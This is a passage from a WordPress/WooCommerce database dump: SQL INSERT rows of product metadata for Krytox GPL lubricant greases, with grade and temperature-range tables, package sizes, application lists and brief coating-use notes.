INSERT INTO `wp_postmeta` VALUES (7223, 814, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7224, 814, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7225, 814, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7226, 814, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7227, 814, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7228, 814, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7229, 814, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7230, 814, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7231, 814, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7232, 814, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7233, 814, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7234, 814, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7235, 814, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7236, 814, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7237, 814, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7238, 814, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7239, 814, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7240, 814, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7241, 814, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7242, 814, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7243, 814, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7244, 814, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7245, 814, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7246, 814, '_ywtm_content_tab_description', 'Krytox GPL 200–207 greases are white buttery greases with\r\nall of the same properties as the Krytox GPL 100–107 oils that\r\nthey are made from, but they are in grease form.\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf">GPL PDF</a>'); 
INSERT INTO `wp_postmeta` VALUES (7247, 814, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7248, 814, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7249, 814, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7250, 814, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7251, 814, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7252, 814, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Sheet";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7253, 814, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7254, 814, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7277, 814, '_thumbnail_id', '793'); 
INSERT INTO `wp_postmeta` VALUES (7278, 814, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7279, 814, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7301, 738, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (7302, 402, '_thumbnail_id', '795'); 
INSERT INTO `wp_postmeta` VALUES (7303, 622, '716_default_editor', 'MS-452N can be applied by dipping, brushing or spraying.  For spraying applications, it is usually thinned 20-25% by weight with Xylene.  The resin dries in 30 minutes and is fully cured in 24 hours.'); 
INSERT INTO `wp_postmeta` VALUES (7304, 622, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (7305, 622, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (7306, 623, '716_default_editor', 'To remove silicone, acrylic, urethane and varnish coatings:\r\n\r\nSoak for about thirty minutes or more, then rinse thoroughly with alcohol.  For urethane and varnish coatings it may be necessary to soak for several hours before the soakings will break up or dissolve.'); 
INSERT INTO `wp_postmeta` VALUES (7307, 623, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (7308, 623, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (7309, 490, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (7310, 402, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7311, 402, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7312, 818, '_edit_lock', '1475589457:2'); 
INSERT INTO `wp_postmeta` VALUES (7313, 818, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7314, 818, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7315, 818, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7316, 818, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7317, 818, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7318, 818, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7319, 818, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7320, 818, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7321, 818, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7322, 818, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7323, 818, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7324, 818, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7325, 818, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7326, 818, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7327, 818, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7328, 818, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7329, 818, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7330, 818, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7331, 818, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7332, 818, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7333, 818, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7334, 818, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7335, 818, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7336, 818, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7337, 818, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7338, 818, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7339, 818, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7340, 818, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7341, 818, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7342, 818, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7343, 818, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7344, 818, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7345, 818, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (7346, 818, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7347, 818, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7348, 818, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7349, 818, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7350, 818, '_product_image_gallery', '380,375,377,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7351, 818, '_thumbnail_id', '794'); 
INSERT INTO `wp_postmeta` VALUES (7352, 818, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7353, 818, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7375, 818, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7376, 818, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7377, 819, '_edit_lock', '1475589498:2'); 
INSERT INTO `wp_postmeta` VALUES (7378, 819, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7379, 819, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7380, 819, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7381, 819, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7382, 819, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7383, 819, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7384, 819, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7385, 819, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7386, 819, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7387, 819, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7388, 819, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7389, 819, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7390, 819, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7391, 819, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (7392, 819, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (7393, 819, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7394, 819, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7395, 819, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7396, 819, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (7397, 819, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (7398, 819, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (7399, 819, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (7400, 819, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7401, 819, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7402, 819, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (7403, 819, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7404, 819, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (7405, 819, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (7406, 819, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7407, 819, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7408, 819, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (7409, 819, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (7410, 819, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (7411, 819, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7412, 819, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7413, 819, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (7414, 819, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (7415, 819, '_product_image_gallery', '380,375,377,379,381'); 
INSERT INTO `wp_postmeta` VALUES (7417, 819, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7418, 819, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (7440, 819, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (7441, 819, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (7507, 821, '_edit_lock', '1475589720:2'); 
INSERT INTO `wp_postmeta` VALUES (7508, 821, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (7509, 821, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (7510, 821, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (7511, 821, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7512, 821, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (7513, 821, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (7514, 821, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (7515, 821, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7516, 821, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7517, 821, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (7518, 821, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (7519, 821, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (7520, 821, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (7521, 821, '_width', ''); 
